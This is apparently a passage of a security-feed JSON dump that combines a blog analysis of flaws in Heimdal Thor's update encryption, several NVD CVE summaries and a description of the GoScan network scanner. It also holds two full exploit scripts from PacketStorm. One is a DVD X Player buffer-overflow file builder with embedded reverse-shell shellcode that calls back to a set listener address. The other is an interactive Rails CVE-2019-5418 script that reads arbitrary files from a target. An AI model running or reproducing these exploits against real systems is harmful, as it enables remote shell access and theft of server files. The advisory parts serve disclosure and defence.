quote:\n\n\n\n\u2026did not correctly validate the TLS certificates \u2026which would allow a highly skilled attacker with network access to be able to see details like hostname, hard drive serial number and motherboard serial number.\n\n\n\n\u2026and the RCI?!\n\n### Analysis\n\nSo what went wrong here?\n\nHeimdal Thor is security software that runs at a high level of privilege on a user\u2019s machine. It\u2019s essential that it is held to the highest possible standards; we feel they have fallen far short.\n\nThe certificate validation issue should have been caught far earlier:\n\n * Many instances of certificate validation can be caught at the code review stage \u2013 I have lost count of the number of times that it is turned off for \u201cdevelopment\u201d and left off when deployed.\n * Significant changes to software should be tested. Checking that certificate validation is working should be done frequently, and ideally, automatically.\n\n### There\u2019s more\n\nI also noticed that the application wasn\u2019t downloading normal executables for updates \u2013 these were .enc files, hosted by Heimdal.\n\nEntropy analysis of the downloaded files indicated that they were encrypted. But how?\n\nThe application is written in .NET. This makes decompilation trivial. Within minutes, we have found decryption code\n\n\n\nRijndael is the predecessor to AES. Looking for references to this, we find it being used to decrypt files, with the key and IV being set to the slightly suspicious \u201cCryptingConstants.Key\u201d and \u201cCryptingConstants.IV\u201d.\n\n\n\nAnd as expected, both key and IV are static, unchanging values across all installs of Heimdal Thor.\n\n\n\nThe issues don\u2019t stop there with encryption. RijndaelManaged inherits from SymmetricAlgorithm, which by default uses CBC mode. This mode provides no authentication. Changes to the cipher text \u2013 either accidental or malicious \u2013 could go unnoticed.\n\nYou may also note that there is a \u201cchecksum\u201d field in the JSON returned by the server. That\u2019s an MD5 checksum. It might be helpful to detect accidental changes to the update file, but it\u2019s not a barrier to an attacker. They would just generate a new MD5 and replace the old one.\n\nIn summary, the encryption provides neither confidentiality or authenticity.\n\nThe encryption is, in my opinion, a failure at the design and specification stage. It looks like there is a requirement for confidentiality \u2013 but confidentiality from who? Designing a cryptography system requires very clear security goals from the outset. Our recommendation here would be to start from the scratch all over again.", "modified": "2019-03-21T16:01:33", "published": "2019-03-21T16:01:33", "id": "PENTESTPARTNERS:F177B07EFB3FB179C998C78EA1A0756D", "href": "https://www.pentestpartners.com/security-blog/remote-command-injection-through-an-endpoint-security-product/", "type": "pentestpartners", "title": "Remote command injection through an endpoint security product", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2019-03-22T10:43:12", "bulletinFamily": "NVD", "description": "In PuTTY versions before 0.71 on Windows, local attackers could hijack the application by putting a malicious help file in the same directory as the executable.", "modified": "2019-03-21T13:56:31", "published": "2019-03-21T12:01:17", "id": "CVE-2019-9896", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-9896", "title": "CVE-2019-9896", "type": "cve", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-03-22T10:43:11", "bulletinFamily": "NVD", "description": "IBM DB2 for Linux, UNIX and Windows (includes DB2 Connect Server) 9.7, 10.1, 10.5, and 11.1 binaries load shared libraries from an untrusted path potentially giving low privilege user full access to root by loading a malicious shared library. IBM X-Force ID: 158014.", "modified": "2019-03-21T12:01:05", "published": "2019-03-21T12:01:05", "id": "CVE-2019-4094", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-4094", "title": "CVE-2019-4094", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-03-22T11:11:39", "bulletinFamily": "NVD", "description": "eVisitorPass could allow a local attacker to gain elevated privileges on the system, caused by an error with the Virtual Keyboard Start Menu. By visiting the kiosk and pressing windows key twice, an attacker could exploit this vulnerability to close the program and launch other processes on the system.", "modified": "2019-03-21T12:00:25", "published": "2019-03-21T12:00:25", "id": "CVE-2018-17494", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-17494", "title": "CVE-2018-17494", "type": "cve", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2019-03-22T19:33:38", "bulletinFamily": "exploit", "description": "", "modified": "2019-03-21T00:00:00", "published": "2019-03-21T00:00:00", "id": "PACKETSTORM:152177", "href": "https://packetstormsecurity.com/files/152177/DVD-X-Player-5.5.3-Buffer-Overflow.html", "title": "DVD X Player 5.5.3 Buffer Overflow", "type": "packetstorm", "sourceData": "`#!/usr/bin/env python \n \n# Exploit Title: DVD X Player 5.5.3 Buffer Overflow \n# Date: 20.03.2019 \n# Exploit Author: Paolo Perego - paolo@armoredcode.com \n# Vendor Homepage: http://www.dvd-x-player.com \n# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe \n# Version: 5.5.3.8 and above \n# Tested on: Windows 7 Professional SP1 x86 \n# CVE : CVE-2018-9128 \n# Similiar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438 \n# In Windows 7, SEH handler to be used contains a \\x00 byte that it has been \n# obtained using a restricted char. For such a reason, every jump has to be \n# backward on the beginning of attacking shellcode. \n \n# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\\x00\\x0a\\x1a\\x0d' -f py -v shellcode \n \nshellcode = \"\" \nshellcode += \"\\xb8\\xb8\\xfa\\xed\\xbb\\xda\\xc1\\xd9\\x74\\x24\\xf4\\x5a\" \nshellcode += \"\\x33\\xc9\\xb1\\x52\\x31\\x42\\x12\\x03\\x42\\x12\\x83\\x7a\" \nshellcode += \"\\xfe\\x0f\\x4e\\x86\\x17\\x4d\\xb1\\x76\\xe8\\x32\\x3b\\x93\" \nshellcode += \"\\xd9\\x72\\x5f\\xd0\\x4a\\x43\\x2b\\xb4\\x66\\x28\\x79\\x2c\" \nshellcode += \"\\xfc\\x5c\\x56\\x43\\xb5\\xeb\\x80\\x6a\\x46\\x47\\xf0\\xed\" \nshellcode += \"\\xc4\\x9a\\x25\\xcd\\xf5\\x54\\x38\\x0c\\x31\\x88\\xb1\\x5c\" \nshellcode += \"\\xea\\xc6\\x64\\x70\\x9f\\x93\\xb4\\xfb\\xd3\\x32\\xbd\\x18\" \nshellcode += \"\\xa3\\x35\\xec\\x8f\\xbf\\x6f\\x2e\\x2e\\x13\\x04\\x67\\x28\" \nshellcode += \"\\x70\\x21\\x31\\xc3\\x42\\xdd\\xc0\\x05\\x9b\\x1e\\x6e\\x68\" \nshellcode += \"\\x13\\xed\\x6e\\xad\\x94\\x0e\\x05\\xc7\\xe6\\xb3\\x1e\\x1c\" \nshellcode += \"\\x94\\x6f\\xaa\\x86\\x3e\\xfb\\x0c\\x62\\xbe\\x28\\xca\\xe1\" \nshellcode += \"\\xcc\\x85\\x98\\xad\\xd0\\x18\\x4c\\xc6\\xed\\x91\\x73\\x08\" \nshellcode += \"\\x64\\xe1\\x57\\x8c\\x2c\\xb1\\xf6\\x95\\x88\\x14\\x06\\xc5\" \nshellcode += \"\\x72\\xc8\\xa2\\x8e\\x9f\\x1d\\xdf\\xcd\\xf7\\xd2\\xd2\\xed\" \nshellcode += \"\\x07\\x7d\\x64\\x9e\\x35\\x22\\xde\\x08\\x76\\xab\\xf8\\xcf\" \nshellcode += \"\\x79\\x86\\xbd\\x5f\\x84\\x29\\xbe\\x76\\x43\\x7d\\xee\\xe0\" \nshellcode += \"\\x62\\xfe\\x65\\xf0\\x8b\\x2b\\x29\\xa0\\x23\\x84\\x8a\\x10\" \nshellcode += \"\\x84\\x74\\x63\\x7a\\x0b\\xaa\\x93\\x85\\xc1\\xc3\\x3e\\x7c\" \nshellcode += \"\\x82\\x2b\\x16\\x46\\x38\\xc4\\x65\\xb6\\xad\\x48\\xe3\\x50\" \nshellcode += \"\\xa7\\x60\\xa5\\xcb\\x50\\x18\\xec\\x87\\xc1\\xe5\\x3a\\xe2\" \nshellcode += \"\\xc2\\x6e\\xc9\\x13\\x8c\\x86\\xa4\\x07\\x79\\x67\\xf3\\x75\" \nshellcode += \"\\x2c\\x78\\x29\\x11\\xb2\\xeb\\xb6\\xe1\\xbd\\x17\\x61\\xb6\" \nshellcode += \"\\xea\\xe6\\x78\\x52\\x07\\x50\\xd3\\x40\\xda\\x04\\x1c\\xc0\" \nshellcode += \"\\x01\\xf5\\xa3\\xc9\\xc4\\x41\\x80\\xd9\\x10\\x49\\x8c\\x8d\" \nshellcode += \"\\xcc\\x1c\\x5a\\x7b\\xab\\xf6\\x2c\\xd5\\x65\\xa4\\xe6\\xb1\" \nshellcode += \"\\xf0\\x86\\x38\\xc7\\xfc\\xc2\\xce\\x27\\x4c\\xbb\\x96\\x58\" \nshellcode += \"\\x61\\x2b\\x1f\\x21\\x9f\\xcb\\xe0\\xf8\\x1b\\xf5\\x11\\x30\" \nshellcode += \"\\xb6\\x62\\x88\\xa1\\xfb\\xee\\x2b\\x1c\\x3f\\x17\\xa8\\x94\" \nshellcode += \"\\xc0\\xec\\xb0\\xdd\\xc5\\xa9\\x76\\x0e\\xb4\\xa2\\x12\\x30\" \nshellcode += \"\\x6b\\xc2\\x36\" \n \njunk = \"\\x90\" * (600 -len(shellcode)) \njunk += shellcode \n \n# nasm > jmp $-400 \n# 00000000 E96BFEFFFF jmp 0xfffffe70 \nbackflip=\"\\x90\\x90\\x90\\xE9\\x6B\\xFE\\xFF\\xFF\" \njunk += backflip \n \n# 00401838 |. 5E POP ESI \njunk += \"\\xeb\\xf6\\x90\\x90\" \njunk += \"\\x38\\x18\\x40\\x1a\" \n \nfile = open(\"evil_playlist.plf\", \"w\") \nfile.write(junk) \nfile.close() \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/152177/dvdxplayer553-overflow.txt"}, {"lastseen": "2019-03-22T19:33:38", "bulletinFamily": "exploit", "description": "", "modified": "2019-03-21T00:00:00", "published": "2019-03-21T00:00:00", "id": "PACKETSTORM:152178", "href": "https://packetstormsecurity.com/files/152178/Rails-5.2.1-Arbitrary-File-Content-Disclosure.html", "title": "Rails 5.2.1 Arbitrary File Content Disclosure", "type": "packetstorm", "sourceData": "`''' \nExploit Title: File Content Disclosure on Rails \nDate: CVE disclosed 3/16 today's date is 3/20 \nExploit Author: NotoriousRebel \nVendor Homepage: https://rubyonrails.org/ \nSoftware Link: https://github.com/rails/rails \nVersion: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1 \nTested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows) \nCVE: 2019-5418 \n''' \nimport sys \n \ntry: \nimport requests \nexcept ImportError: \nprint('\\n\\033[93m[!] Requests library not found, please install before proceeding.\\n\\n \\033[0m') \nsys.exit(1) \n \n \ndef banner(): \nbanner = \"\"\" \n---------------------------------------------- \nArbitrary Traversal exploit for Ruby on Rails \nCVE-2019-5418 \n---------------------------------------------- \n\"\"\" \nprint(banner) \n \ndef check_args(): \nif len(sys.argv) != 2: \nprint(\"Invalid number of arguments entered!\") \nhow_to_use = \"python3 Bandit.py url\" \nprint('Use as:', how_to_use) \nsys.exit(1) \n \n \ndef check_url(url): \nstatus_code = requests.get(url) \nif status_code != 200: \nprint(\"Url is invalid or can not be reached!\") \nsys.exit(1) \n \n \ndef read_file(url, file): \nheaders = {'Accept': file + '{{'} \nreq = requests.get(url, headers=headers) \nreturn req \n \n \ndef main(): \nbanner() \ncheck_args() \nurl = sys.argv[1] \nwhile True: \ntry: \nfile = input(\"Enter file to read (enter quit to exit): \") \nexcept Exception: \nfile = raw_input(\"Enter file to read (enter quit to exit): \") \ntry: \nif file.lower() == 'quit': \nbreak \nexcept Exception: \nif file == 'quit': \nbreak \nresponse = read_file(url, file) \nprint(response.text) \n \n \nif __name__ == '__main__': \ntry: \nmain() \nexcept KeyboardInterrupt: \nprint('\\n\\n\\033[93m[!] ctrl+c detected from user, quitting.\\n\\n \\033[0m') \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/152178/rails521-disclose.txt"}], "kitploit": [{"lastseen": "2019-03-21T00:06:56", "bulletinFamily": "tools", "description": "[  ](<https://3.bp.blogspot.com/-YVU7QmSrbn0/XJJmWaK-bOI/AAAAAAAAOSM/F1Ygv92rvyAhdIgrnUMeuVp7rjP3JbCVgCLcBGAs/s1600/goscan_1_goscan_logo.png>)\n\n \n\n\n** GoScan ** is an interactive network scanner client, featuring auto-completion, which provides abstraction and [ automation ](<https://www.kitploit.com/search/label/Automation>) over nmap. \n\nAlthough it started as a small side-project I developed in order to learn [ @golang ](<https://twitter.com/golang>) , GoScan can now be used to perform host discovery, port scanning, and service [ enumeration ](<https://www.kitploit.com/search/label/Enumeration>) not only in situations where being stealthy is not a priority and time is limited (think at CTFs, OSCP, exams, etc.), but also (with a few tweaks in its configuration) during professional engagements. \n\n \n\n\nGoScan is also particularly suited for unstable environments (think unreliable network connectivity, lack of \" ` screen ` \", etc.), given that it fires scans and maintain their state in an SQLite database. Scans run in the background (detached from the main thread), so even if connection to the box running GoScan is lost, results can be uploaded asynchronously (more on this below). That is, data can be imported into GoScan at different stages of the process, without the need to restart the entire process from scratch if something goes wrong. \n\nIn addition, the [ Service Enumeration ](<https://www.kitploit.com/search/label/Service%20Enumeration>) phase integrates a collection of other tools (e.g., ` EyeWitness ` , ` Hydra ` , ` nikto ` , etc.), each one tailored to target a specific service. \n\n \n\n\n[  ](<https://4.bp.blogspot.com/-DztE7eRhtqA/XJJmrqr8onI/AAAAAAAAOSU/ECdJDb-fFjkuc4YVnMlVEYRJSqfjNhRBwCLcBGAs/s1600/goscan_2_demo.gif>)\n\n \n** Installation ** \n \n** Binary installation (Recommended) ** \nBinaries are available from the [ Release ](<https://github.com/marco-lancini/goscan/releases>) page. \n\n \n \n # Linux (64bit)\n $ wget https://github.com/marco-lancini/goscan/releases/download/v2.3/goscan_2.3_linux_amd64.zip\n $ unzip goscan_2.3_linux_amd64.zip\n \n # Linux (32bit)\n $ wget https://github.com/marco-lancini/goscan/releases/download/v2.3/goscan_2.3_linux_386.zip\n $ unzip goscan_2.3_linux_386.zip\n \n # After that, place the executable in your PATH\n $ chmod +x goscan\n $ sudo mv ./goscan /usr/local/bin/goscan\n\n \n** Build from source ** \n\n \n \n $ git clone https://github.com/marco-lancini/goscan.git\n $ cd goscan/goscan/\n $ make setup\n $ make build\n\nTo create a multi-platform binary, use the cross command via make: \n\n \n \n $ make cross\n\n \n** Docker ** \n\n \n \n $ git clone https://github.com/marco-lancini/goscan.git\n $ cd goscan/\n $ docker-compose up --build\n\n \n** Usage ** \nGoScan supports all the main steps of network enumeration: \n \n\n\n[  ](<https://1.bp.blogspot.com/-eG7YHIMYBKw/XJJm8X5KlWI/AAAAAAAAOSY/v0lYzUxFtnMsVxVo3yYgz5O5p8fMaNDbwCLcBGAs/s1600/goscan_3_goscan_process.png>)\n\n \n \nStep | Commands \n---|--- \n1\\. ** Load targets ** | \n\n * Add a single target via the CLI (must be a valid CIDR): ` load target SINGLE <IP/32> `\n * Upload multiple targets from a text file or folder: ` load target MULTI <path-to-file> ` \n2\\. ** Host Discovery ** | \n\n * Perform a Ping Sweep: ` sweep <TYPE> <TARGET> `\n * Or load results from a previous discovery: \n * Add a single alive host via the CLI (must be a /32): ` load alive SINGLE <IP> `\n * Upload multiple alive hosts from a text file or folder: ` load alive MULTI <path-to-file> ` \n3\\. ** Port Scanning ** | \n\n * Perform a port scan: ` portscan <TYPE> <TARGET> `\n * Or upload nmap results from XML files or folder: ` load portscan <path-to-file> ` \n4\\. ** Service Enumeration ** | \n\n * Dry Run (only show commands, without performing them): ` enumerate <TYPE> DRY <TARGET> `\n * Perform enumeration of detected services: ` enumerate <TYPE> <POLITE/AGGRESSIVE> <TARGET> ` \n5\\. ** Special Scans ** | \n\n * _ EyeWitness _\n * Take screenshots of websites, RDP services, and open VNC servers (KALI ONLY): ` special eyewitness `\n * ` EyeWitness.py ` needs to be in the system path \n * _ Extract (Windows) domain information from enumeration data _\n * ` special domain <users/hosts/servers> `\n * _ DNS _\n * Enumerate DNS (nmap, dnsrecon, dnsenum): ` special dns DISCOVERY <domain> `\n * Bruteforce DNS: ` special dns BRUTEFORCE <domain> `\n * Reverse [ Bruteforce ](<https://www.kitploit.com/search/label/Bruteforce>) DNS: ` special dns BRUTEFORCE_REVERSE <domain> <base_IP> ` \n** Utils ** | \n\n * Show results: ` show <targets/hosts/ports> `\n * Automatically configure settings by loading a config file: ` set config_file <PATH> `\n * Change the output folder (by default ` ~/goscan ` ): ` set output_folder <PATH> `\n * Modify the default nmap switches: ` set nmap_switches <SWEEP/TCP_FULL/TCP_STANDARD/TCP_VULN/UDP_STANDARD> <SWITCHES> `\n * Modify the default wordlists: ` set_wordlists <FINGER_USER/FTP_USER/...> <PATH> ` \n \n** External Integrations ** \nThe _ Service Enumeration _ phase currently supports the following integrations: \nWHAT | INTEGRATION \n---|--- \nARP | \n\n * nmap \nDNS | \n\n * nmap \n * dnsrecon \n * dnsenum \n * host \nFINGER | \n\n * nmap \n * finger-user-enum \nFTP | \n\n * nmap \n * ftp-user-enum \n * hydra [AGGRESSIVE] \nHTTP | \n\n * nmap \n * nikto \n * dirb \n * EyeWitness \n * sqlmap [AGGRESSIVE] \n * fimap [AGGRESSIVE] \nRDP | \n\n * nmap \n * EyeWitness \nSMB | \n\n * nmap \n * enum4linux \n * nbtscan \n * samrdump \nSMTP | \n\n * nmap \n * smtp-user-enum \nSNMP | \n\n * nmap \n * snmpcheck \n * onesixtyone \n * snmpwalk \nSSH | \n\n * hydra [AGGRESSIVE] \nSQL | \n\n * nmap \nVNC | \n\n * EyeWitness \n \n \n\n\n** [ Download Goscan ](<https://github.com/marco-lancini/goscan>) **\n", "modified": "2019-03-20T20:14:02", "published": "2019-03-20T20:14:02", "id": "KITPLOIT:4632630842516742319", "href": "http://www.kitploit.com/2019/03/goscan-interactive-network-scanner.html", "title": "Goscan - Interactive Network Scanner", "type": "kitploit", "cvss": {"score": 0.0, "vector": "NONE"}}]}
